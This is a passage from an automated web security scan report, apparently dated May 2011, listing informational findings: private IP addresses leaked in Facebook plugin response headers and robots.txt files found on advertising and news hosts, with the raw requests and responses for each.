Content-Type: text/html; charset=utf-8
X-FB-Server: 10.54.19.44
X-Cnection: close
Date: Mon, 09 May 2011 15:41:36 GMT
Content-Length: 10041

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...

21.22. http://www.facebook.com/plugins/like.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /plugins/like.php?href=facebook.com/ChristianScienceMonitor&layout=button_count&show_faces=true&width=110&action=like&font=arial&colorscheme=light&height=21 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.csmonitor.com/Business
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; datr=ituyTcnawc6q7VcE0gibPCo2

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.54.60.34
X-Cnection: close
Date: Mon, 09 May 2011 15:35:06 GMT
Content-Length: 6900

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...

21.23. http://www.facebook.com/plugins/like.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /plugins/like.php?channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df3c96bf9e8%26origin%3Dhttp%253A%252F%252Fwww.fox8live.com%252Ff1697eaaa4%26relation%3Dparent.parent%26transport%3Dpostmessage&font=arial&href=http%3A%2F%2Fwww.facebook.com%2F%23!%2Fpages%2FWVUE-FOX-8-News%2F107322144609&layout=standard&locale=en_US&node_type=link&sdk=joey&show_faces=false&width=450 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.fox8live.com/news/local/story/St-Bernard-prepares-for-rising-Mississippi-River/vJUO9a9n60iNAXZ6QCm2oQ.cspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; datr=ituyTcnawc6q7VcE0gibPCo2

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.54.114.51
X-Cnection: close
Date: Mon, 09 May 2011 15:38:01 GMT
Content-Length: 10159

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...

21.24. http://www.facebook.com/plugins/like.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /plugins/like.php?href=http%3A%2F%2Fwww.csmonitor.com%2FBusiness%2F2011%2F0509%2FGas-prices-start-to-head-down%3Fcmpid%3Dfacebook_like&layout=standard&show_faces=false&width=450&action=recommend&colorscheme=light&height=25 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.csmonitor.com/Business/2011/0509/Gas-prices-start-to-head-down
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; datr=ituyTcnawc6q7VcE0gibPCo2

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.54.73.35
X-Cnection: close
Date: Mon, 09 May 2011 15:38:05 GMT
Content-Length: 9232

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...

21.25. http://www.facebook.com/plugins/like.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /plugins/like.php?channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df19edaa63%26origin%3Dhttp%253A%252F%252Fwww.fox8live.com%252Ff13543b984%26relation%3Dparent.parent%26transport%3Dpostmessage&font=arial&href=http%3A%2F%2Fwww.facebook.com%2F%23!%2Fpages%2FWVUE-FOX-8-News%2F107322144609&layout=standard&locale=en_US&node_type=link&sdk=joey&show_faces=false&width=450 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.fox8live.com/default.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; datr=ituyTcnawc6q7VcE0gibPCo2

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.54.49.40
X-Cnection: close
Date: Mon, 09 May 2011 15:39:01 GMT
Content-Length: 9982

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...

21.26. http://www.facebook.com/plugins/like.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /plugins/like.php?channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df690cc8cc%26origin%3Dhttp%253A%252F%252Fwww.fox8live.com%252Ffdf0b3de8%26relation%3Dparent.parent%26transport%3Dpostmessage&font=arial&href=http%3A%2F%2Fwww.facebook.com%2F%23!%2Fpages%2FWVUE-FOX-8-News%2F107322144609&layout=standard&locale=en_US&node_type=link&sdk=joey&show_faces=false&width=450 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.fox8live.com/rss/default.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; datr=ituyTcnawc6q7VcE0gibPCo2

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.54.126.61
X-Cnection: close
Date: Mon, 09 May 2011 15:39:07 GMT
Content-Length: 9990

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...

21.27. http://www.facebook.com/plugins/like.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /plugins/like.php?href=http%3A//www.usatoday.com/weather/floods/2011-05-02-ohio-mississippi-river-floods_n.htm%2Fpage%2Fto%2Flike&layout=button_count&show_faces=false&width=125&action=recommend&colorscheme=light&height=21 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.usatoday.com/weather/floods/2011-05-02-ohio-mississippi-river-floods_n.htm
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; datr=ituyTcnawc6q7VcE0gibPCo2

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.54.35.40
X-Cnection: close
Date: Mon, 09 May 2011 15:36:48 GMT
Content-Length: 7034

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...

21.28. http://www.facebook.com/plugins/recommendations.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/recommendations.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /plugins/recommendations.php?site=www.csmonitor.com&width=270&height=590&header=false&colorscheme=light&font=arial&border_color=%23fff HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.csmonitor.com/Business
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; datr=ituyTcnawc6q7VcE0gibPCo2

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.55.25.50
X-Cnection: close
Date: Mon, 09 May 2011 15:35:07 GMT
Content-Length: 19190

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...

21.29. http://www.facebook.com/plugins/recommendations.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/recommendations.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /plugins/recommendations.php?site=www.csmonitor.com&width=270&height=590&header=false&colorscheme=light&font=arial&border_color=%23fff HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.csmonitor.com/Business/2011/0509/Gas-prices-start-to-head-down
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; datr=ituyTcnawc6q7VcE0gibPCo2

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.54.82.36
X-Cnection: close
Date: Mon, 09 May 2011 15:38:08 GMT
Content-Length: 19230

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...

21.30. http://www.facebook.com/plugins/recommendations.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/recommendations.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /plugins/recommendations.php?site=www.csmonitor.com&width=270&height=590&header=false&colorscheme=light&font=arial&border_color=%23fff HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.csmonitor.com/Business
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; datr=ituyTcnawc6q7VcE0gibPCo2

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.54.83.47
X-Cnection: close
Date: Mon, 09 May 2011 15:36:10 GMT
Content-Length: 19190

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...

22. Robots.txt file
There are 63 instances of this issue:

Issue background

The file robots.txt is used to give instructions to web robots, such as search engine crawlers, about locations within the web site which robots are allowed, or not allowed, to crawl and index.

The presence of the robots.txt does not in itself present any kind of security vulnerability. However, it is often used to identify restricted or private areas of a site's contents. The information in the file may therefore help an attacker to map out the site's contents, especially if some of the locations identified are not linked from elsewhere in the site. If the application relies on robots.txt to protect access to these areas, and does not enforce proper access control over them, then this presents a serious vulnerability.

Issue remediation

The robots.txt file is not itself a security threat, and its correct use can represent good practice for non-security reasons. You should not assume that all web robots will honour the file's instructions. Rather, assume that attackers will pay close attention to any locations identified in the file. Do not rely on robots.txt to provide any kind of protection over unauthorised access.


22.1. http://ad.amgdgt.com/ads/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.amgdgt.com
Path:   /ads/

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: ad.amgdgt.com

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 15:35:20 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Thu, 19 Mar 2009 21:31:08 GMT
ETag: "b044005-1a-4657f84ac9f00"
Accept-Ranges: bytes
Content-Length: 26
Cache-Control: max-age=172800
Expires: Wed, 11 May 2011 15:35:20 GMT
Connection: close
Content-Type: text/plain; charset=UTF-8

User-agent: *
Disallow: /

22.2. http://ad.doubleclick.net/pfadx/csmonitor_cim/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /pfadx/csmonitor_cim/

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: ad.doubleclick.net

Response

HTTP/1.0 200 OK
Server: DCLK-HttpSvr
Content-Type: text/plain
Content-Length: 101
Last-Modified: Thu, 18 Mar 2010 15:31:04 GMT
Date: Mon, 09 May 2011 15:35:02 GMT

User-Agent: AdsBot-Google
Disallow:

User-Agent: MSNPTC
Disallow:

User-agent: *
Disallow: /

22.3. http://ads.pointroll.com/PortalServe/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.pointroll.com
Path:   /PortalServe/

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: ads.pointroll.com

Response

HTTP/1.1 200 OK
Content-Length: 26
Content-Type: text/plain
Last-Modified: Tue, 26 Oct 2010 14:01:22 GMT
Accept-Ranges: bytes
ETag: "43bb7d451675cb1:12dc"
Server: Microsoft-IIS/6.0
P3P: CP="NOI DSP COR PSAo PSDo OUR BUS OTC"
Date: Mon, 09 May 2011 15:35:09 GMT
Connection: close

User-agent: *
Disallow: /

22.4. http://amch.questionmarket.com/adscgen/sta.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://amch.questionmarket.com
Path:   /adscgen/sta.php

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: amch.questionmarket.com

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 15:40:02 GMT
Server: Apache/2.2.3
Last-Modified: Tue, 28 Mar 2006 15:45:05 GMT
ETag: "e0610677-1a-4100ff999c240"
Accept-Ranges: bytes
Content-Length: 26
Keep-Alive: timeout=5, max=842
Connection: Keep-Alive
Content-Type: text/plain

User-agent: *
Disallow: /

22.5. http://api.twitter.com/1/wvuefox8/lists/wvue-fox-8-3/statuses.json

Summary

Severity:   Information
Confidence:   Certain
Host:   http://api.twitter.com
Path:   /1/wvuefox8/lists/wvue-fox-8-3/statuses.json

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: api.twitter.com

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 15:39:42 GMT
Server: Apache
Vary: Host,Accept-Encoding
Set-Cookie: k=173.193.214.243.1304955582523786; path=/; expires=Mon, 16-May-11 15:39:42 GMT; domain=.twitter.com
Last-Modified: Wed, 04 May 2011 17:32:26 GMT
Accept-Ranges: bytes
Content-Length: 26
Cache-Control: max-age=86400
Expires: Tue, 10 May 2011 15:39:42 GMT
Connection: close
Content-Type: text/plain; charset=UTF-8

User-agent: *
Disallow: /

22.6. http://assets1.grouponcdn.com/stylesheets/app/subscriptions/subscribe_2s208.css

Summary

Severity:   Information
Confidence:   Certain
Host:   http://assets1.grouponcdn.com
Path:   /stylesheets/app/subscriptions/subscribe_2s208.css

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: assets1.grouponcdn.com

Response

HTTP/1.0 200 OK
Server: nginx/0.7.65
Content-Type: text/plain
Accept-Ranges: bytes
Age: 90034
Date: Mon, 09 May 2011 15:35:37 GMT
Last-Modified: Thu, 18 Nov 2010 03:41:54 GMT
Content-Length: 25
Connection: close

User-agent: *
Disallow: /

22.7. http://at.amgdgt.com/ads/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://at.amgdgt.com
Path:   /ads/

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: at.amgdgt.com

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 15:35:46 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Thu, 19 Mar 2009 21:31:08 GMT
ETag: "b044005-1a-4657f84ac9f00"
Accept-Ranges: bytes
Content-Length: 26
Cache-Control: max-age=172800
Expires: Wed, 11 May 2011 15:35:46 GMT
Connection: close
Content-Type: text/plain; charset=UTF-8

User-agent: *
Disallow: /

22.8. http://atd.agencytradingdesk.net/WatsonTracker/IMP/A1000138/C1000187/P1003017/pixel.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   http://atd.agencytradingdesk.net
Path:   /WatsonTracker/IMP/A1000138/C1000187/P1003017/pixel.gif

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: atd.agencytradingdesk.net

Response

HTTP/1.1 200 OK
Content-Length: 135
Content-Type: text/plain
Last-Modified: Wed, 07 Feb 2007 15:35:46 GMT
Accept-Ranges: bytes
ETag: "18b4e0a2cd4ac71:64e"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Mon, 09 May 2011 15:36:51 GMT
Connection: keep-alive
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT"

User-agent: *
Allow: /Corporate/
Disallow: /TagPublish/
Disallow: /xt2/
Disallow: /rt1/
Disallow: /CWClick/
Disallow: /ContextAd/

22.9. http://b.scorecardresearch.com/b

Summary

Severity:   Information
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /b

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: b.scorecardresearch.com

Response

HTTP/1.0 200 OK
Last-Modified: Wed, 06 Jan 2010 17:35:59 GMT
Content-Length: 28
Content-Type: text/plain
Expires: Tue, 10 May 2011 15:34:58 GMT
Date: Mon, 09 May 2011 15:34:58 GMT
Connection: close
Cache-Control: private, no-transform, max-age=86400
Server: CS

User-agent: *
Disallow: /

22.10. http://b.voicefive.com/b

Summary

Severity:   Information
Confidence:   Certain
Host:   http://b.voicefive.com
Path:   /b

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: b.voicefive.com

Response

HTTP/1.0 200 OK
Last-Modified: Wed, 06 Jan 2010 17:35:59 GMT
Content-Length: 28
Content-Type: text/plain
Expires: Tue, 10 May 2011 15:35:23 GMT
Date: Mon, 09 May 2011 15:35:23 GMT
Connection: close
Cache-Control: private, no-transform, max-age=86400
Server: CS

User-agent: *
Disallow: /

22.11. http://b3.mookie1.com/2/ZapTrader/ATT/Wired/Pros-Legacy/All/14a155dda-808a-4648-a03d-f65de2ef0ada@x90

Summary

Severity:   Information
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /2/ZapTrader/ATT/Wired/Pros-Legacy/All/14a155dda-808a-4648-a03d-f65de2ef0ada@x90

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: b3.mookie1.com

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 15:38:57 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Last-Modified: Thu, 17 Jun 2010 13:44:25 GMT
ETag: "1ff0232-1a-4893a095c6040"
Accept-Ranges: bytes
Content-Length: 26
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/plain
Set-Cookie: NSC_o4efm_qppm_iuuq=ffffffff09419e5245525d5f4f58455e445a4a423660;path=/;httponly

User-agent: *
Disallow: /

22.12. http://bidder.mathtag.com/iframe/notify

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bidder.mathtag.com
Path:   /iframe/notify

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: bidder.mathtag.com

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 15:36:17 GMT
Server: MMBD/3.5.5
Content-Type: text/plain
Content-Length: 25
x-mm-host: ewr-bidder-x6
Connection: close

User-agent: *
Disallow: /

22.13. http://bs.serving-sys.com/BurstingPipe/adServer.bs

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bs.serving-sys.com
Path:   /BurstingPipe/adServer.bs

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: bs.serving-sys.com

Response

HTTP/1.1 200 OK
Content-Type: text/plain
Last-Modified: Mon, 16 Jan 2006 20:19:44 GMT
Accept-Ranges: bytes
ETag: "0b02b30da1ac61:0"
P3P: CP="NOI DEVa OUR BUS UNI"
Date: Mon, 09 May 2011 15:38:52 GMT
Connection: close
Content-Length: 28

User-agent: *
Disallow: /

22.14. http://cache-01.cleanprint.net/cp/psj

Summary

Severity:   Information
Confidence:   Certain
Host:   http://cache-01.cleanprint.net
Path:   /cp/psj

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: cache-01.cleanprint.net

Response

HTTP/1.0 200 OK
Server: None
ETag: "2e-4767523e05c00"
Accept-Ranges: bytes
X-Server: FD-03
Vary: Accept-Encoding
Content-Type: text/plain
Content-Language: en
Age: 62905
Date: Mon, 09 May 2011 15:37:23 GMT
Last-Modified: Wed, 21 Oct 2009 17:16:32 GMT
Content-Length: 46
Connection: close

# Deny all robots
User-agent: *
Disallow: /


22.15. http://content.usatoday.com/apps/insidepage/crc.ashx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://content.usatoday.com
Path:   /apps/insidepage/crc.ashx

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: content.usatoday.com

Response

HTTP/1.1 200 OK
Content-Type: text/plain
Last-Modified: Fri, 24 Sep 2010 18:31:30 GMT
Accept-Ranges: bytes
ETag: "0eda5b4165ccb1:0"
Server: Microsoft-IIS/7.5
P3P: CP="CAO CUR ADM DEVa TAIi PSAa PSDa CONi OUR OTRi IND PHY ONL UNI COM NAV DEM", POLICYREF="URI"
Date: Mon, 09 May 2011 15:38:09 GMT
Connection: close
Content-Length: 1660

# robots.txt for http://www.usatoday.com
sitemap: http://www.usatoday.com/USAToday_sitemap.xml
User-agent:*
Disallow:/feedback
Disallow:/HTML
Disallow:/html
Disallow:/cgi-bin
Disallow:/system

...[SNIP]...

22.16. http://contextweb.usatoday.net/asp/Context/ContextWebHandler.ashx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://contextweb.usatoday.net
Path:   /asp/Context/ContextWebHandler.ashx

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: contextweb.usatoday.net

Response

HTTP/1.0 200 OK
Content-Type: text/plain
Last-Modified: Fri, 24 Sep 2010 18:31:30 GMT
Accept-Ranges: bytes
ETag: "0eda5b4165ccb1:0"
Server: Microsoft-IIS/7.5
P3P: CP="CAO CUR ADM DEVa TAIi PSAa PSDa CONi OUR OTRi IND PHY ONL UNI COM NAV DEM", POLICYREF="URI"
Content-Length: 1660
Date: Mon, 09 May 2011 15:36:35 GMT
